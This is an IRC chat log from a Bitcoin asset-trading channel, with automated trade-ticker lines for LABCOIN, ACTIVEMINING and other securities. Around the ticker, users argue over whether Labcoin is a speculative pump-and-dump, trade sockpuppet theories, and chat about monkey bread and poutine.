bbet publishes intake graphs Sep 14 08:31:27 I dropped my side pot into LC for the hype. Sep 14 08:31:31 [BTCTC] [LABCOIN] 1 @ 0.001615 BTC [+] Sep 14 08:31:35 It's a speculators dream. Sep 14 08:31:38 Until it's not. Sep 14 08:31:39 lol Sep 14 08:31:42 heh. Sep 14 08:31:58 I think they have absolutely zero long term prospects. Sep 14 08:32:02 [BTCTC] [LABCOIN] 1 @ 0.00159 BTC [-] Sep 14 08:32:03 [BTCTC] [LABCOIN] 3 @ 0.001551 = 0.0047 BTC [-] Sep 14 08:32:05 [BTCTC] [LABCOIN] 30 @ 0.00155 = 0.0465 BTC [-] Sep 14 08:32:06 [BTCTC] [LABCOIN] 40 @ 0.001524 = 0.061 BTC [-] Sep 14 08:32:07 [BTCTC] [LABCOIN] 400 @ 0.001523 = 0.6092 BTC [-] Sep 14 08:32:07 [BTCTC] [LABCOIN] 4 @ 0.001509 = 0.006 BTC [-] Sep 14 08:32:08 But for the month of september, it's HOT. Sep 14 08:32:08 [BTCTC] [LABCOIN] 40 @ 0.001508 = 0.0603 BTC [-] Sep 14 08:32:09 [BTCTC] [LABCOIN] 140 @ 0.001503 = 0.2104 BTC [-] Sep 14 08:32:10 [BTCTC] [LABCOIN] 342 @ 0.001502 = 0.5137 BTC [-] Sep 14 08:32:12 you should work for labcoin Sep 14 08:32:13 LOL Sep 14 08:32:18 you say things that dont jive well Sep 14 08:32:24 [BTCTC] [ACTIVEMINING] 58 @ 0.002908 = 0.1687 BTC [+] Sep 14 08:32:25 [BTCTC] [ACTIVEMINING] 465 @ 0.002907 = 1.3518 BTC [-] Sep 14 08:32:26 Like what? Sep 14 08:32:27 [BTCTC] [ACTIVEMINING] 250 @ 0.002901 = 0.7253 BTC [-] Sep 14 08:32:28 [BTCTC] [ACTIVEMINING] 227 @ 0.0029 = 0.6583 BTC [-] Sep 14 08:32:32 like the nonsense above ? Sep 14 08:32:34 They're hot for amonth? Sep 14 08:32:54 Give me a fuckin' argument. Sep 14 08:32:56 Goddamn. Sep 14 08:33:00 [BTCTC] [LABCOIN] 200 @ 0.001503 = 0.3006 BTC [+] Sep 14 08:33:02 [BTCTC] [LABCOIN] 280 @ 0.001502 = 0.4206 BTC [-] Sep 14 08:33:07 no business run by known scammers on scammy exchange ? Sep 14 08:33:12 what exactly are you missing. Sep 14 08:33:16 Not you, MP. Sep 14 08:33:17 hold on i'll i think i can let you do the arguing for you Sep 14 08:33:21 You are the same fuckin record. Sep 14 08:33:28 TAT Sep 14 08:33:30 [BTCTC] [ASICMINER-PT] 2 @ 2.16 = 4.32 BTC [+] Sep 14 08:33:32 yes, people who are right and consistently so tend to say the same things. Sep 14 08:33:32 [BTCTC] [LABCOIN] 197 @ 0.00151 = 0.2975 BTC [+] Sep 14 08:33:33 [BTCTC] [LABCOIN] 660 @ 0.001505 = 0.9933 BTC [-] Sep 14 08:33:35 [BTCTC] [LABCOIN] 778 @ 0.001502 = 1.1686 BTC [-] Sep 14 08:33:36 [BTCTC] [LABCOIN] 167 @ 0.001502 = 0.2508 BTC [-] Sep 14 08:33:37 [BTCTC] [LABCOIN] 198 @ 0.001502 = 0.2974 BTC [-] Sep 14 08:33:39 that's not a problem, that's a quality. Sep 14 08:33:39 [BTCTC] [ACTIVEMINING] 773 @ 0.0029 = 2.2417 BTC [-] Sep 14 08:33:45 No. You just say the same thing about everything. Sep 14 08:33:48 [01:29] I am absolutely no fanboy, but I think they have a chip, and I think they WILL be mining shortly. Sep 14 08:33:49 I have no interst in your shit. Sep 14 08:33:49 [01:31] I dropped my side pot into LC for the hype. Sep 14 08:33:53 [01:32] I think they have absolutely zero long term prospects. Sep 14 08:33:55 you've not been paying so very much attention eh. Sep 14 08:34:06 What about that doesn't make sense? Sep 14 08:34:10 [BTCTC] [ASICMINER-PT] 1 @ 2.15 BTC [-] Sep 14 08:34:22 [BTCTC] [LABCOIN] 1000 @ 0.001506 = 1.506 BTC [+] Sep 14 08:34:24 It's speculation. They freak. pump and dump Sep 14 08:34:28 It's ripe. Sep 14 08:34:28 it makes no difference what you have interest in. Sep 14 08:34:33 MP, please... Sep 14 08:34:38 nope. Sep 14 08:34:46 kleeck you can only polish a turd so much Sep 14 08:34:50 see, this is why it sucks being nobody: it doesn't matter what you'd like. Sep 14 08:34:50 I agree. Sep 14 08:34:55 get used to it or fix it. Sep 14 08:34:55 [BTCTC] [ASICMINER-PT] 1 @ 2.15 BTC [-] Sep 14 08:34:57 And maybe I over polished. lol. Sep 14 08:34:59 [BTCTC] [ASICMINER-PT] 2 @ 2.15 = 4.3 BTC [-] Sep 14 08:35:12 I think many people got hypnotised with how shiny it was Sep 14 08:35:23 gotta gem heh. Sep 14 08:35:33 and it smell so rosy then one day the blinkers come off Sep 14 08:35:34 But nothing I said was inconsistent with reality. It is volatile, and you can ride the P&D. And yes, I may have just got burned. Sep 14 08:35:37 fuck u coconut Sep 14 08:35:46 you are anotheranon, right? Sep 14 08:35:47 i think we've summed it up nicely over the weeks in a number ways Sep 14 08:35:49 [BTCTC] [LABCOIN] 200 @ 0.0016 = 0.32 BTC [+] Sep 14 08:35:49 and they realise they've got their nose deep in a steaming heap Sep 14 08:35:55 [BTCTC] [LABCOIN] 800 @ 0.0016 = 1.28 BTC [+] Sep 14 08:35:57 I don't think I was hypontized. I saw it for what it was. I think... Sep 14 08:36:05 UNLESS it was bait for speculation. Sep 14 08:36:11 In which case I was duped. Sep 14 08:36:11 [BTCTC] [LABCOIN] 800 @ 0.001599 = 1.2792 BTC [-] Sep 14 08:36:12 Kleeck so you got burned. there's a reason investors don't touch hyips and the rest of the crud. Sep 14 08:36:15 [BTCTC] [LABCOIN] 22 @ 0.001616 = 0.0356 BTC [+] Sep 14 08:36:16 [BTCTC] [LABCOIN] 44 @ 0.001617 = 0.0711 BTC [+] Sep 14 08:36:17 [BTCTC] [LABCOIN] 98 @ 0.001705 = 0.1671 BTC [+] Sep 14 08:36:19 [BTCTC] [LABCOIN] 197 @ 0.00171 = 0.3369 BTC [+] Sep 14 08:36:20 [BTCTC] [LABCOIN] 197 @ 0.001711 = 0.3371 BTC [+] Sep 14 08:36:20 this "it could have worked" stuff is nonsense. Sep 14 08:36:21 [BTCTC] [LABCOIN] 44 @ 0.001713 = 0.0754 BTC [+] Sep 14 08:36:22 [BTCTC] [LABCOIN] 40 @ 0.001714 = 0.0686 BTC [+] Sep 14 08:36:23 [BTCTC] [LABCOIN] 1 @ 0.001715 BTC [+] Sep 14 08:36:24 [BTCTC] [LABCOIN] 5 @ 0.001715 = 0.0086 BTC [+] Sep 14 08:36:24 That remains to be seen. Sep 14 08:36:25 [BTCTC] [LABCOIN] 1 @ 0.001716 BTC [+] Sep 14 08:36:25 [BTCTC] [LABCOIN] 97 @ 0.001717 = 0.1665 BTC [+] Sep 14 08:36:26 [BTCTC] [LABCOIN] 97 @ 0.001718 = 0.1666 BTC [+] Sep 14 08:36:27 [BTCTC] [LABCOIN] 96 @ 0.00173 = 0.1661 BTC [+] Sep 14 08:36:28 [BTCTC] [LABCOIN] 96 @ 0.001731 = 0.1662 BTC [+] Sep 14 08:36:29 [BTCTC] [LABCOIN] 705 @ 0.001739 = 1.226 BTC [+] Sep 14 08:36:30 [BTCTC] [LABCOIN] 38 @ 0.001743 = 0.0662 BTC [+] Sep 14 08:36:31 [BTCTC] [LABCOIN] 99 @ 0.001744 = 0.1727 BTC [+] Sep 14 08:36:32 [BTCTC] [LABCOIN] 97 @ 0.001757 = 0.1704 BTC [+] Sep 14 08:36:33 [BTCTC] [LABCOIN] 100 @ 0.00177 = 0.177 BTC [+] Sep 14 08:36:33 [BTCTC] [LABCOIN] 97 @ 0.001783 = 0.173 BTC [+] Sep 14 08:36:34 [BTCTC] [LABCOIN] 97 @ 0.001796 = 0.1742 BTC [+] Sep 14 08:36:35 This security is all over the map. Sep 14 08:36:35 [MPEX] [S.MPOE] 7100 @ 0.00090886 = 6.4529 BTC [+] Sep 14 08:36:36 [BTCTC] [LABCOIN] 705 @ 0.001809 = 1.2753 BTC [+] Sep 14 08:36:42 it's not a security. Sep 14 08:36:44 I'm in at a low price point. Sep 14 08:36:52 so I could easily see a return. Sep 14 08:36:55 even in a few days. Sep 14 08:36:57 i wonder how would one get this point across. Sep 14 08:37:06 By being clear. Sep 14 08:37:10 [BTCTC] [LABCOIN] 234 @ 0.001811 = 0.4238 BTC [+] Sep 14 08:37:11 Communication is not magic. Sep 14 08:37:12 people wanna gem. people wanna gamble. people prefer profiting by mistake rather than on purpose. people's greed forcing them to bestow 'next ASICMINER' status to everything. people feeling they missed out on AM / early bitcoin need to get in the 'ground floor'. Sep 14 08:37:12 etc Sep 14 08:37:13 [BTCTC] [LABCOIN] 99 @ 0.001809 = 0.1791 BTC [-] Sep 14 08:37:14 etc Sep 14 08:37:15 etc Sep 14 08:37:29 ok, how about this for clarity : you could in principle obtain a positive return by inserting dollar bills into vaginas. Sep 14 08:37:33 I'll be honst TAT, I was absolutely gambling. I did NOT believe in this "company". Sep 14 08:37:34 [BTCTC] [LABCOIN] 167 @ 0.001809 = 0.3021 BTC [-] Sep 14 08:37:38 it MAY happen that a five dollar bill comes out, at some point. Sep 14 08:37:48 nevertheless, inserting dollar bills in vaginas IS NOT A BUSINESS. Sep 14 08:37:55 And MP show his value yet again. Sep 14 08:38:09 kleeck if you wanna gamble, there are hard-working service providers making that legitimately and efficiently possible Sep 14 08:38:21 [BTCTC] [ASICMINER-PT] 1 @ 2.111 BTC [-] Sep 14 08:38:22 and at a pretty good and well verified rake. Sep 14 08:38:23 [BTCTC] [ASICMINER-PT] 1 @ 2.102 BTC [-] Sep 14 08:38:24 [BTCTC] [ASICMINER-PT] 1 @ 2.101 BTC [-] Sep 14 08:38:27 rather than random rake of 50% Sep 14 08:38:28 I've chosen my poison. :) Sep 14 08:38:35 [BTCTC] [LABCOIN] 177 @ 0.001813 = 0.3209 BTC [+] Sep 14 08:38:37 [BTCTC] [LABCOIN] 16 @ 0.00181 = 0.029 BTC [-] Sep 14 08:38:37 [BTCTC] [LABCOIN] 98 @ 0.001809 = 0.1773 BTC [-] Sep 14 08:38:38 [BTCTC] [LABCOIN] 19 @ 0.0018 = 0.0342 BTC [-] Sep 14 08:38:39 [BTCTC] [LABCOIN] 6 @ 0.001798 = 0.0108 BTC [-] Sep 14 08:38:44 wonder if moderator score will be down later Sep 14 08:38:52 [BTCTC] [ACTIVEMINING] 150 @ 0.002851 = 0.4277 BTC [-] Sep 14 08:38:53 [BTCTC] [ACTIVEMINING] 250 @ 0.00285 = 0.7125 BTC [-] Sep 14 08:38:59 moderator score is meaningless Sep 14 08:38:59 coconut possibly as the moderators themselves get underwater. Sep 14 08:39:04 [BTCTC] [LABCOIN] 119 @ 0.001811 = 0.2155 BTC [+] Sep 14 08:39:16 it serves one purpose, delaying new issues for a random amount of time Sep 14 08:39:22 true Sep 14 08:39:24 [BTCTC] [LABCOIN] 200 @ 0.001854 = 0.3708 BTC [+] Sep 14 08:39:26 [BTCTC] [LABCOIN] 146 @ 0.001802 = 0.2631 BTC [-] Sep 14 08:39:28 [BTCTC] [LABCOIN] 34 @ 0.001801 = 0.0612 BTC [-] Sep 14 08:39:32 [BTCTC] [LABCOIN] 1063 @ 0.001854 = 1.9708 BTC [+] Sep 14 08:40:01 [BTCTC] [LABCOIN] 132 @ 0.001856 = 0.245 BTC [+] Sep 14 08:40:02 [BTCTC] [LABCOIN] 268 @ 0.001854 = 0.4969 BTC [-] Sep 14 08:40:04 [BTCTC] [LABCOIN] 51 @ 0.001854 = 0.0946 BTC [-] Sep 14 08:40:06 [BTCTC] [LABCOIN] 200 @ 0.001854 = 0.3708 BTC [-] Sep 14 08:40:07 [BTCTC] [LABCOIN] 60 @ 0.001801 = 0.1081 BTC [-] Sep 14 08:40:08 to tha moon ? Sep 14 08:40:08 [BTCTC] [LABCOIN] 189 @ 0.0018 = 0.3402 BTC [-] Sep 14 08:40:15 To the core! Sep 14 08:40:19 darn i missed it. Sep 14 08:40:44 Ah. The dramaz. I dig this way too much. I'm out gents. Sep 14 08:40:52 [BTCTC] [LABCOIN] 41 @ 0.001886 = 0.0773 BTC [+] Sep 14 08:40:53 [BTCTC] [LABCOIN] 89 @ 0.001857 = 0.1653 BTC [-] Sep 14 08:40:54 adios Sep 14 08:40:54 [BTCTC] [LABCOIN] 51 @ 0.001855 = 0.0946 BTC [-] Sep 14 08:40:55 [BTCTC] [LABCOIN] 200 @ 0.001855 = 0.371 BTC [-] Sep 14 08:40:56 [BTCTC] [LABCOIN] 997 @ 0.00181 = 1.8046 BTC [-] Sep 14 08:41:05 what's happening now is the greatest scam i've seen on btct Sep 14 08:41:08 but it's not labcoin Sep 14 08:41:11 [BTCTC] [LABCOIN] 41 @ 0.001913 = 0.0784 BTC [+] Sep 14 08:41:14 but "them" Sep 14 08:41:18 !!!! Sep 14 08:41:20 [BTCTC] [LABCOIN] 41 @ 0.001943 = 0.0797 BTC [+] Sep 14 08:41:23 ? Sep 14 08:41:54 didn't you noticed that the lab thread was spammed in 30 seconds intervals by different users with the same content over and over and over again? Sep 14 08:42:03 for hours? Sep 14 08:42:13 yeap Sep 14 08:42:13 [BTCTC] [LABCOIN] 41 @ 0.001959 = 0.0803 BTC [+] Sep 14 08:42:17 coconut here Sep 14 08:42:17 most registered around july 13 Sep 14 08:42:26 changes his nick to TheSeven Sep 14 08:42:31 declares he left the team Sep 14 08:42:33 [BTCTC] [LABCOIN] 41 @ 0.001985 = 0.0814 BTC [+] Sep 14 08:42:36 how is something on the forum, the biggest scam on BTCT? Sep 14 08:42:39 comes back as TheSwede75 Sep 14 08:42:50 dexX7 yes yes. Sep 14 08:42:53 oh, correction: related to btct Sep 14 08:42:54 [BTCTC] [LABCOIN] 59 @ 0.001811 = 0.1068 BTC [-] Sep 14 08:43:05 maybe scam isn't the right word Sep 14 08:43:06 [BTCTC] [LABCOIN] 61 @ 0.001846 = 0.1126 BTC [+] Sep 14 08:43:07 [BTCTC] [LABCOIN] 28 @ 0.001857 = 0.052 BTC [+] Sep 14 08:43:18 manipulation? Sep 14 08:43:19 btct did kinda spawn some good sock targets Sep 14 08:43:24 but manipulation of a far greater degree than usual Sep 14 08:43:25 [BTCTC] [LABCOIN] 61 @ 0.001857 = 0.1133 BTC [+] Sep 14 08:43:33 how do you emasure the degrees ? Sep 14 08:43:37 and it was theseveM Sep 14 08:43:43 [BTCTC] [ACTIVEMINING] 708 @ 0.002856 = 2.022 BTC [+] Sep 14 08:43:43 DexX7, you are probably on to something. Sep 14 08:43:44 [BTCTC] [ACTIVEMINING] 327 @ 0.002855 = 0.9336 BTC [-] Sep 14 08:43:46 like Garr255 Sep 14 08:43:48 because TheSeven had the sense to register his name. Sep 14 08:43:50 thatg was a good one Sep 14 08:43:56 wait, really? Sep 14 08:43:59 [BTCTC] [NASTY-PT] 10 @ 0.0016 = 0.016 BTC [-] Sep 14 08:44:00 well look up. Sep 14 08:44:06 lol Sep 14 08:44:15 you srsly didnt see the m? Sep 14 08:44:19 noobs always get caught in this sorta shit. the guy was being humorous. Sep 14 08:44:21 I did. Sep 14 08:44:26 [BTCTC] [NASTY-PT] 10 @ 0.0015 = 0.015 BTC [-] Sep 14 08:44:29 [BTCTC] [LABCOIN] 15 @ 0.001858 = 0.0279 BTC [+] Sep 14 08:44:30 [BTCTC] [LABCOIN] 70 @ 0.001857 = 0.13 BTC [-] Sep 14 08:44:32 [BTCTC] [LABCOIN] 89 @ 0.001857 = 0.1653 BTC [-] Sep 14 08:44:33 [BTCTC] [LABCOIN] 6 @ 0.001823 = 0.0109 BTC [-] Sep 14 08:44:34 [BTCTC] [LABCOIN] 61 @ 0.001822 = 0.1111 BTC [-] Sep 14 08:44:35 [BTCTC] [LABCOIN] 159 @ 0.001812 = 0.2881 BTC [-] Sep 14 08:44:37 dexX7: come on friend thesevem Sep 14 08:44:41 Well, not just noobs, but people looking for answers. Sep 14 08:44:42 are you serious.. Sep 14 08:44:44 [BTCTC] [ACTIVEMINING] 100 @ 0.003049 = 0.3049 BTC [+] Sep 14 08:44:51 there are no nickchanges in the bitcoin-asset.com log Sep 14 08:44:56 or tired or w/e. Sep 14 08:45:01 sure Sep 14 08:45:02 as if i wouldn't have put a little more effort in than that Sep 14 08:45:10 [BTCTC] [ACTIVEMINING] 600 @ 0.002856 = 1.7136 BTC [-] Sep 14 08:45:21 coconut is so offeneded Sep 14 08:45:24 'thesevem' omg you think I'm expecting 200k dump, behave yourself Sep 14 08:45:24 [BTCTC] [NASTY-PT] 1 @ 0.001485 BTC [-] Sep 14 08:45:26 [BTCTC] [NASTY-PT] 10 @ 0.0014 = 0.014 BTC [-] Sep 14 08:45:28 [BTCTC] [ACTIVEMINING] 71 @ 0.002859 = 0.203 BTC [+] Sep 14 08:45:28 [BTCTC] [ACTIVEMINING] 27 @ 0.002856 = 0.0771 BTC [-] Sep 14 08:45:29 oh *m Sep 14 08:45:29 [BTCTC] [NASTY-PT] 20 @ 0.0013 = 0.026 BTC [-] Sep 14 08:45:30 [BTCTC] [LABCOIN] 110 @ 0.001935 = 0.2129 BTC [+] Sep 14 08:45:31 [BTCTC] [NASTY-PT] 6 @ 0.001211 = 0.0073 BTC [-] Sep 14 08:45:32 [BTCTC] [LABCOIN] 890 @ 0.0019 = 1.691 BTC [-] Sep 14 08:45:35 i'm quite in a rush right now Sep 14 08:45:36 [BTCTC] [ACTIVEMINING] 2 @ 0.002856 = 0.0057 BTC [-] Sep 14 08:45:37 [BTCTC] [LABCOIN] 101 @ 0.0019 = 0.1919 BTC [-] Sep 14 08:45:39 Sep 14 06:58:45 bobbabad:no disregard that news Sep 14 08:45:39 Sep 14 06:58:54 you heard it here first folks Sep 14 08:45:39 Sep 14 06:59:20 Wait. Sep 14 08:45:39 Sep 14 06:59:22 lol Sep 14 08:45:39 Sep 14 06:59:22 Heard what? Sep 14 08:45:39 Sep 14 06:59:34 --- TheSevem is now known as coconut Sep 14 08:45:45 kinda hard to miss. Sep 14 08:45:48 yup, saw it. thanks. Sep 14 08:45:49 it's blatant sarcasm Sep 14 08:45:51 Does that unravel your theory, dexX7 Sep 14 08:46:00 well some theories only live a minute. Sep 14 08:46:07 :P Sep 14 08:46:14 [BTCTC] [LABCOIN] 9009 @ 0.0019 = 17.1171 BTC [-] Sep 14 08:46:19 [BTCTC] [LABCOIN] 10 @ 0.001962 = 0.0196 BTC [+] Sep 14 08:46:24 dexX7: are you heavily invested? Sep 14 08:46:24 it supports my "theory" Sep 14 08:46:33 Then go on Sep 14 08:46:56 from labcoin PR "however Labcoin also does not want the same kind of 'hysteria' that surrounds Sep 14 08:46:56 ASICMINER every time pool rate drops or increases." Sep 14 08:47:01 truth there Sep 14 08:47:10 hehe Sep 14 08:47:16 lolwut. Sep 14 08:47:43 i had what seemed at the time a good idea, ie hosting a cake-off. now i have too much cake and my liver hurts ;/ Sep 14 08:47:53 [BTCTC] [LABCOIN] 94 @ 0.001871 = 0.1759 BTC [-] Sep 14 08:47:55 [BTCTC] [LABCOIN] 1000 @ 0.001812 = 1.812 BTC [-] Sep 14 08:47:55 [BTCTC] [LABCOIN] 220 @ 0.001812 = 0.3986 BTC [-] Sep 14 08:47:56 [BTCTC] [LABCOIN] 1000 @ 0.001811 = 1.811 BTC [-] Sep 14 08:47:58 [BTCTC] [LABCOIN] 1203 @ 0.00181 = 2.1774 BTC [-] Sep 14 08:48:12 [BTCTC] [LABCOIN] 1 @ 0.001813 BTC [+] Sep 14 08:48:14 Just loan me through BTC-BOND and be done with it. Sep 14 08:48:25 [BTCTC] [LABCOIN] 94 @ 0.001897 = 0.1783 BTC [+] Sep 14 08:48:38 [BTCTC] [LABCOIN] 65 @ 0.001814 = 0.1179 BTC [-] Sep 14 08:48:40 [BTCTC] [LABCOIN] 100 @ 0.001814 = 0.1814 BTC [-] Sep 14 08:48:41 [BTCTC] [LABCOIN] 77 @ 0.001813 = 0.1396 BTC [-] Sep 14 08:48:42 [BTCTC] [LABCOIN] 10 @ 0.001802 = 0.018 BTC [-] Sep 14 08:48:44 [BTCTC] [LABCOIN] 100 @ 0.001801 = 0.1801 BTC [-] Sep 14 08:48:45 [BTCTC] [LABCOIN] 100 @ 0.001701 = 0.1701 BTC [-] Sep 14 08:48:46 [BTCTC] [LABCOIN] 836 @ 0.0017 = 1.4212 BTC [-] Sep 14 08:49:00 [BTCTC] [LABCOIN] 62 @ 0.001899 = 0.1177 BTC [+] Sep 14 08:49:13 these labcoin boards seem awfully simple Sep 14 08:49:20 [BTCTC] [LABCOIN] 62 @ 0.001809 = 0.1122 BTC [-] Sep 14 08:49:27 not that i know shit about asic boards Sep 14 08:49:31 [BTCTC] [LABCOIN] 300 @ 0.001898 = 0.5694 BTC [+] Sep 14 08:49:44 but they look like chipholders with no other tech Sep 14 08:49:48 simple is always best. Sep 14 08:49:58 keep it simple stupid Sep 14 08:50:10 [BTCTC] [LABCOIN] 50 @ 0.001879 = 0.094 BTC [-] Sep 14 08:50:11 maybe they plug into a host unit? Sep 14 08:50:14 ah well idc Sep 14 08:50:35 yeah its supposed to plug into a masterboard Sep 14 08:50:39 [BTCTC] [LABCOIN] 3 @ 0.001782 = 0.0053 BTC [-] Sep 14 08:50:40 [BTCTC] [LABCOIN] 59 @ 0.001781 = 0.1051 BTC [-] Sep 14 08:50:42 [BTCTC] [LABCOIN] 50 @ 0.001878 = 0.0939 BTC [+] Sep 14 08:50:49 [MPEX] [S.MPOE] 3950 @ 0.00090769 = 3.5854 BTC [-] Sep 14 08:50:53 I'm starting a cookie mining operation. I'll be mining through with this http://orteil.dashnet.org/cookieclicker/ Sep 14 08:51:07 Delicious virtual cookies. Sep 14 08:51:09 [BTCTC] [LABCOIN] 50 @ 0.00188 = 0.094 BTC [+] Sep 14 08:51:19 Produced generously. Sep 14 08:51:38 dexX7, you got a reply from the swede himself https://bitcointalk.org/index.php?topic=263445.msg3150381#msg3150381 Sep 14 08:51:43 (Seriously tho, nice little time waster of an idling game) Sep 14 08:51:56 [BTCTC] [LABCOIN] 3 @ 0.001803 = 0.0054 BTC [-] Sep 14 08:51:56 This version is still pretty buggy!! Sep 14 08:51:59 those are just boards without components on it Sep 14 08:52:13 http://i.imgur.com/4qqgoPD.jpg this picture makes it very clear that there are no traces running to the ICs Sep 14 08:52:14 [BTCTC] [LABCOIN] 5 @ 0.001899 = 0.0095 BTC [+] Sep 14 08:52:38 oh. yeah that's mid production pcb Sep 14 08:52:44 it hastabe Sep 14 08:53:08 what are you talking about, they are hashing on that right this very moment Sep 14 08:53:13 [BTCTC] [LABCOIN] 5 @ 0.001898 = 0.0095 BTC [-] Sep 14 08:53:21 [BTCTC] [LABCOIN] 57 @ 0.001899 = 0.1082 BTC [+] Sep 14 08:53:22 i wonder if any labcoin holders remember how long it took BFL to get their shit working at al Sep 14 08:53:22 [BTCTC] [LABCOIN] 88 @ 0.0019 = 0.1672 BTC [+] Sep 14 08:53:25 l Sep 14 08:53:27 experimental hashing, maybe Sep 14 08:53:41 [BTCTC] [LABCOIN] 20 @ 0.00188 = 0.0376 BTC [-] Sep 14 08:53:43 [BTCTC] [LABCOIN] 226 @ 0.001806 = 0.4082 BTC [-] Sep 14 08:54:07 [BTCTC] [LABCOIN] 6 @ 0.001866 = 0.0112 BTC [+] Sep 14 08:54:08 gangplank in the sense that they smoke it or what. Sep 14 08:54:33 [BTCTC] [LABCOIN] 4 @ 0.001899 = 0.0076 BTC [+] Sep 14 08:55:23 [BTCTC] [LABCOIN] 100 @ 0.00189 = 0.189 BTC [-] Sep 14 08:55:31 They already claimed to be running untested chips. This was to be expected. Sep 14 08:55:38 Half their chips burned up. Sep 14 08:55:42 isnt the very act of running them... Sep 14 08:55:48 eh nm. what do i understand of forum stuff. Sep 14 08:55:51 this direct PR to the masses is actual issue though. Sep 14 08:56:02 all these shareholders acting like they run companies Sep 14 08:56:12 Shareholders need to learn their place. Sep 14 08:56:18 I agree. Sep 14 08:56:24 [HAVELOCK] [SDSTM] 3 @ 0.00278999 = 0.0084 BTC [+] Sep 14 08:56:32 you're like trolling me right ? Sep 14 08:56:35 [BTCTC] [LABCOIN] 4 @ 0.001899 = 0.0076 BTC [+] Sep 14 08:56:36 [BTCTC] [LABCOIN] 6 @ 0.0019 = 0.0114 BTC [+] Sep 14 08:56:37 hehe Sep 14 08:56:38 [BTCTC] [LABCOIN] 500 @ 0.0019 = 0.95 BTC [+] Sep 14 08:56:49 [BTCTC] [LABCOIN] 490 @ 0.0019 = 0.931 BTC [+] Sep 14 08:56:51 [BTCTC] [LABCOIN] 107 @ 0.001852 = 0.1982 BTC [-] Sep 14 08:56:52 [BTCTC] [LABCOIN] 8 @ 0.00185 = 0.0148 BTC [-] Sep 14 08:56:53 [BTCTC] [LABCOIN] 240 @ 0.00185 = 0.444 BTC [-] Sep 14 08:56:55 [BTCTC] [LABCOIN] 6 @ 0.001839 = 0.011 BTC [-] Sep 14 08:56:56 [BTCTC] [LABCOIN] 200 @ 0.001829 = 0.3658 BTC [-] Sep 14 08:56:57 [BTCTC] [LABCOIN] 10 @ 0.001812 = 0.0181 BTC [-] Sep 14 08:56:58 [BTCTC] [LABCOIN] 23 @ 0.001812 = 0.0417 BTC [-] Sep 14 08:56:59 [BTCTC] [LABCOIN] 59 @ 0.001811 = 0.1068 BTC [-] Sep 14 08:57:00 [BTCTC] [LABCOIN] 110 @ 0.00181 = 0.1991 BTC [-] Sep 14 08:57:05 i'm tired of getting PMs from people asking me whats the deal is with MA's hashing rate on any given day Sep 14 08:57:09 AM's* Sep 14 08:57:21 fuck it, ima jhave another slice of torta caprese on some more monkey bread Sep 14 08:57:22 firstly, how the hell would i know Sep 14 08:57:30 [BTCTC] [LABCOIN] 100 @ 0.00196 = 0.196 BTC [+] Sep 14 08:57:31 at least if i fucking day, it should be the day of today. Sep 14 08:57:31 [BTCTC] [LABCOIN] 220 @ 0.001962 = 0.4316 BTC [+] Sep 14 08:57:32 [BTCTC] [LABCOIN] 110 @ 0.001963 = 0.2159 BTC [+] Sep 14 08:57:33 [BTCTC] [LABCOIN] 292 @ 0.001968 = 0.5747 BTC [+] Sep 14 08:57:34 secondly, why the fuck do you care Sep 14 08:57:34 [BTCTC] [LABCOIN] 99 @ 0.001974 = 0.1954 BTC [+] Sep 14 08:57:35 [BTCTC] [LABCOIN] 668 @ 0.001984 = 1.3253 BTC [+] Sep 14 08:57:36 [BTCTC] [LABCOIN] 98 @ 0.001989 = 0.1949 BTC [+] Sep 14 08:57:37 [BTCTC] [LABCOIN] 174 @ 0.001998 = 0.3477 BTC [+] Sep 14 08:57:38 [BTCTC] [LABCOIN] 39 @ 0.001998 = 0.0779 BTC [+] Sep 14 08:57:41 post the address then Sep 14 08:57:48 When the prospectus says you don't have a vote, and you're investing in a portion of the profits, STFU. Sep 14 08:57:52 what is monkey bread Sep 14 08:57:54 mircea_popescu: Sep 14 08:58:04 It's like cinamon bun Sep 14 08:58:05 coconut it's this old transylvanian thing Sep 14 08:58:12 wow Sep 14 08:58:13 but all clumped together and delicious Sep 14 08:58:13 basically lumps of sweet dough rolled in sugary cinnamon and baked Sep 14 08:58:16 some US places serve it Sep 14 08:58:21 sounds like lada cake Sep 14 08:58:23 local pizza shop does Sep 14 08:58:23 googled, damn that looks good Sep 14 08:58:24 yeah. the us people think it's a us thing Sep 14 08:58:32 It IS good. Sep 14 08:58:36 the mitteleuropa ppl think it's european. kinda funny. Sep 14 08:58:51 i want some monkey bread but i'm in australia Sep 14 08:58:52 That's funny. I never knew where it came from. Sep 14 08:58:54 of course it was me that invested it Sep 14 08:59:00 or Apple maybe Sep 14 08:59:01 look like monkey brains :S Sep 14 08:59:06 Of course. Sep 14 08:59:11 we both like inventing things that already exist Sep 14 08:59:15 [BTCTC] [LABCOIN] 69 @ 0.001927 = 0.133 BTC [-] Sep 14 08:59:32 Tablets and Monkey Brains. Sep 14 08:59:38 Bread Sep 14 08:59:39 lol Sep 14 08:59:50 454 pages of lulz Sep 14 08:59:52 Brains is way more cool. Sep 14 08:59:58 and counting Sep 14 09:00:09 [BTCTC] [LABCOIN] 4 @ 0.001999 = 0.008 BTC [+] Sep 14 09:00:35 I can't wait to wake up tomorrow and see how this shakes out. Sep 14 09:00:35 I guess that means I should go to bed. Sep 14 09:00:36 [BTCTC] [LABCOIN] 65 @ 0.001999 = 0.1299 BTC [+] Sep 14 09:00:49 [BTCTC] [LABCOIN] 4 @ 0.001999 = 0.008 BTC [+] Sep 14 09:00:50 enjoy it, why sleep during your virginity ? Sep 14 09:00:50 [BTCTC] [LABCOIN] 17 @ 0.0019 = 0.0323 BTC [-] Sep 14 09:01:01 [BTCTC] [LABCOIN] 59 @ 0.0019 = 0.1121 BTC [-] Sep 14 09:01:25 I'm so full of Sierra Nevada Torpedo Extra IPA that I can't think straight. Sep 14 09:01:28 [BTCTC] [LABCOIN] 25 @ 0.002 = 0.05 BTC [+] Sep 14 09:01:34 monkey bread? We french canadian have better. We call it "poutine". We also call the russian president "Poutine" Sep 14 09:01:40 My virginity? That's funny. LOL. Sep 14 09:01:41 [BTCTC] [TAT.MINIGAME] 5000 @ 0.00023 = 1.15 BTC [-] Sep 14 09:01:50 Namworld, lol. Sep 14 09:01:51 poutine is meh Sep 14 09:02:11 [BTCTC] [ASICMINER-PT] 1 @ 2.1 BTC [-] Sep 14 09:02:19 Depends on where you're located and what's put in it. Sep 14 09:02:25 probly Sep 14 09:02:27 if homemade all cake is great Sep 14 09:02:29 i tell you this. Sep 14 09:02:30 [BTCTC] [LABCOIN] 17 @ 0.001999 = 0.034 BTC [-] Sep 14 09:02:55 You're in the US? Sep 14 09:02:58 Namworld eh, this is a sweet not a meal. Sep 14 09:03:06 